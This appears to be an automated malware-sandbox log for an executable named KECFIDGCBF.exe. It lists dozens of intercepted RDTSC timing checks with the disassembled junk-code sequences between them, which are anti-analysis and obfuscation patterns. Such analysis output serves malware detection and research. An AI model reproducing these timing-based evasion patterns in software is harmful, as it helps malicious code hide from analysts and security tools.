Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A062CA second address: A06319 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 3A3CA177h 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007F70146AC608h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000015h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 jmp 00007F70146AC60Ah 0x0000002e lea ebx, dword ptr [ebp+1244AD23h] 0x00000034 mov esi, dword ptr [ebp+122D37FDh] 0x0000003a push eax 0x0000003b cld 0x0000003c pop ecx 0x0000003d xchg eax, ebx 0x0000003e pushad 0x0000003f jl 00007F70146AC60Ch 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A06319 second address: A06320 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A18053 second address: A1806C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70146AC615h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A271C3 second address: A271CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F7014CC2CB6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A271CF second address: A271D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A271D3 second address: A27202 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F7014CC2CC1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jmp 00007F7014CC2CC5h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: 9F9C8C second address: 9F9C91 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: 9F9C91 second address: 9F9C97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: 9F9C97 second address: 9F9CA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: 9F9CA3 second address: 9F9CA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: 9F9CA9 second address: 9F9CD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F70146AC60Ch 0x00000009 jmp 00007F70146AC618h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A252D6 second address: A252E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F7014CC2CBCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A252E3 second address: A252FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edx 0x00000006 pop edx 0x00000007 je 00007F70146AC606h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jns 00007F70146AC606h 0x00000018 push edx 0x00000019 pop edx 0x0000001a rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A2545D second address: A25463 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A25463 second address: A25467 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A25467 second address: A25476 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jc 00007F7014CC2CB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A25476 second address: A2547C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A2547C second address: A25483 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A25887 second address: A258A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F70146AC615h 0x00000009 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A259DD second address: A259E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A25B65 second address: A25B6F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F70146AC606h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A25B6F second address: A25B7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edi 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A25B7A second address: A25B83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A25CC9 second address: A25CCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A25F73 second address: A25FC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 jmp 00007F70146AC614h 0x0000000b pop esi 0x0000000c js 00007F70146AC623h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F70146AC60Dh 0x00000019 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A25FC0 second address: A25FDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edx 0x00000008 pushad 0x00000009 ja 00007F7014CC2CB6h 0x0000000f jmp 00007F7014CC2CBDh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A25FDE second address: A25FE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A25FE7 second address: A25FEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A26172 second address: A2617E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A2617E second address: A26182 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A1E183 second address: A1E19B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jc 00007F70146AC606h 0x00000009 pop ecx 0x0000000a js 00007F70146AC612h 0x00000010 jc 00007F70146AC606h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: 9FB841 second address: 9FB862 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F7014CC2CB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F7014CC2CC4h 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A26325 second address: A2632E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A2632E second address: A2634A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F7014CC2CC5h 0x0000000c rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A26D60 second address: A26D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A26D66 second address: A26D6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A26D6A second address: A26D70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A2AE70 second address: A2AE77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A2AE77 second address: A2AE81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F70146AC606h 0x0000000a rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A2B45B second address: A2B461 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A2A37F second address: A2A396 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70146AC613h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A2A396 second address: A2A39C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A2A39C second address: A2A3A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A2B687 second address: A2B69D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7014CC2CC2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A2C77A second address: A2C79B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F70146AC606h 0x0000000e jmp 00007F70146AC613h 0x00000013 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A2C79B second address: A2C7A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A2C7A5 second address: A2C7F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70146AC611h 0x00000007 jp 00007F70146AC606h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 push edx 0x00000013 pop edx 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 pushad 0x0000001a jmp 00007F70146AC617h 0x0000001f jno 00007F70146AC606h 0x00000025 pushad 0x00000026 popad 0x00000027 push edx 0x00000028 pop edx 0x00000029 popad 0x0000002a pushad 0x0000002b pushad 0x0000002c popad 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: 9F671C second address: 9F6720 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: 9F6720 second address: 9F6732 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F70146AC60Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: 9F81EF second address: 9F81FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F7014CC2CBEh 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A34ACF second address: A34AD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F70146AC606h 0x0000000a rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A34AD9 second address: A34B19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7014CC2CC2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007F7014CC2CC1h 0x0000000f jmp 00007F7014CC2CBBh 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F7014CC2CC5h 0x0000001d rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A34B19 second address: A34B21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A34B21 second address: A34B25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A34EE5 second address: A34EFA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 jmp 00007F70146AC60Bh 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A35E8B second address: A35E90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A35E90 second address: A35EB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F70146AC619h 0x00000012 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A362B8 second address: A362BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A362BF second address: A362E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F70146AC612h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push esi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A362E1 second address: A362E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A36A8F second address: A36A96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A36D4B second address: A36D5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F7014CC2CBCh 0x0000000e rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A36FB1 second address: A36FBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A39C65 second address: A39C69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A39C69 second address: A39C82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70146AC611h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A3A6AB second address: A3A6B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A3C7BF second address: A3C7DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70146AC617h 0x00000009 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A3FEF1 second address: A3FEF6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A41EB6 second address: A41EF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push 00000000h 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F70146AC608h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D3026h], edi 0x0000002c xchg eax, esi 0x0000002d push eax 0x0000002e push edx 0x0000002f jp 00007F70146AC60Ch 0x00000035 jbe 00007F70146AC606h 0x0000003b rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A42DDB second address: A42DE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A44FE5 second address: A45004 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F70146AC616h 0x0000000e rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A45004 second address: A45008 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A476F8 second address: A47702 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F70146AC60Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A47702 second address: A47711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A486D7 second address: A486DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A486DB second address: A4873D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 pushad 0x00000009 pushad 0x0000000a or dword ptr [ebp+12445B6Ch], edx 0x00000010 jmp 00007F7014CC2CC5h 0x00000015 popad 0x00000016 jns 00007F7014CC2CBBh 0x0000001c mov esi, 71C748B7h 0x00000021 popad 0x00000022 push 00000000h 0x00000024 mov edi, dword ptr [ebp+122D368Dh] 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push edx 0x0000002f call 00007F7014CC2CB8h 0x00000034 pop edx 0x00000035 mov dword ptr [esp+04h], edx 0x00000039 add dword ptr [esp+04h], 00000019h 0x00000041 inc edx 0x00000042 push edx 0x00000043 ret 0x00000044 pop edx 0x00000045 ret 0x00000046 xchg eax, esi 0x00000047 pushad 0x00000048 push edi 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A4873D second address: A48746 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A48746 second address: A4875C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b jmp 00007F7014CC2CBAh 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A4C947 second address: A4C94D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A4C94D second address: A4C9BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 nop 0x00000007 mov dword ptr [ebp+122D3544h], ecx 0x0000000d and ebx, dword ptr [ebp+122D2002h] 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push esi 0x00000018 call 00007F7014CC2CB8h 0x0000001d pop esi 0x0000001e mov dword ptr [esp+04h], esi 0x00000022 add dword ptr [esp+04h], 00000014h 0x0000002a inc esi 0x0000002b push esi 0x0000002c ret 0x0000002d pop esi 0x0000002e ret 0x0000002f mov dword ptr [ebp+122D34B2h], edi 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push edx 0x0000003a call 00007F7014CC2CB8h 0x0000003f pop edx 0x00000040 mov dword ptr [esp+04h], edx 0x00000044 add dword ptr [esp+04h], 00000017h 0x0000004c inc edx 0x0000004d push edx 0x0000004e ret 0x0000004f pop edx 0x00000050 ret 0x00000051 mov dword ptr [ebp+122D3551h], eax 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a push esi 0x0000005b jmp 00007F7014CC2CBAh 0x00000060 pop esi 0x00000061 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A4D902 second address: A4D906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A4D906 second address: A4D92A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7014CC2CC8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007F7014CC2CB6h 0x00000011 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A4E9CF second address: A4EA52 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a jc 00007F70146AC61Ah 0x00000010 jmp 00007F70146AC614h 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ecx 0x0000001a call 00007F70146AC608h 0x0000001f pop ecx 0x00000020 mov dword ptr [esp+04h], ecx 0x00000024 add dword ptr [esp+04h], 00000019h 0x0000002c inc ecx 0x0000002d push ecx 0x0000002e ret 0x0000002f pop ecx 0x00000030 ret 0x00000031 pushad 0x00000032 mov dword ptr [ebp+122D296Ah], ebx 0x00000038 popad 0x00000039 or dword ptr [ebp+122D238Ah], ebx 0x0000003f push 00000000h 0x00000041 jmp 00007F70146AC611h 0x00000046 xchg eax, esi 0x00000047 jmp 00007F70146AC614h 0x0000004c push eax 0x0000004d pushad 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A4EA52 second address: A4EA56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
